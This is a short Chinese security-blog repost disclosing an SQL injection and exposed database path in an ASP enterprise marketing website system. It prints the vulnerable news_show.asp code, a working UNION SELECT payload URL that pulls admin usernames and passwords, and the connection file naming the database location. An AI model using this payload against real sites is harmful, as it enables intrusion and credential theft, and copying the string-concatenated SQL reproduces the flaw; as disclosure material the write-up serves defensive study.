【Asp】918企业营销网站展示系统注入+爆数据库漏洞 - 脚本漏洞

admin
admin
admin
102210
文章
87
评论
2021年4月3日19:36:11评论73 views字数 819阅读2分43秒阅读模式

news_show.asp

news_show.asp
id=request.QueryString("id")
k=request.QueryString("k")
%>
      
                        set rs3=server.CreateObject("adodb.recordset")
                        sql3="select * from hlf_news where id="&id
                        rs3.open sql3,conn,1,1
                        if not rs3.eof then
%>

过滤问题:

http://127.0.0.1/news_show.asp?id=106 union select 1,admin,3,4,password,6 from hlf_admin

再看后台的conn.asp:

conn.asp

db="../databases/##hongquan.mdb" '数据库文件位置
'on error resume next      '不知道为什么给注释了
set conn=Server.Createobject("adodb.connection") 
conn.open"Provider=Microsoft.Jet.OLEDB.4.0;"&"Data Source=" & Server.MapPath(db)
%>

国际问题了。

文章来源于lcx.cc:【Asp】918企业营销网站展示系统注入+爆数据库漏洞 - 脚本漏洞

相关推荐: 【转载】我的祖国 - 中国现实,相当犀利的文笔

    “我的祖国已经越来越显现出浮躁,狂热,悲哀,迷茫的气息。社会在财富的迅速积累下,糜烂与堕落,国富民衰的迹象越来越明显,各级政府处处想着与民争利,社会两极分化异常严重。富人们肆无忌惮的忘乎所以,穷人们走投无路般的苟延残喘,青年人的思想在社会的约束中扼杀,…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:36:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Asp】918企业营销网站展示系统注入+爆数据库漏洞 - 脚本漏洞http://cn-sec.com/archives/323831.html

发表评论

匿名网友 填写信息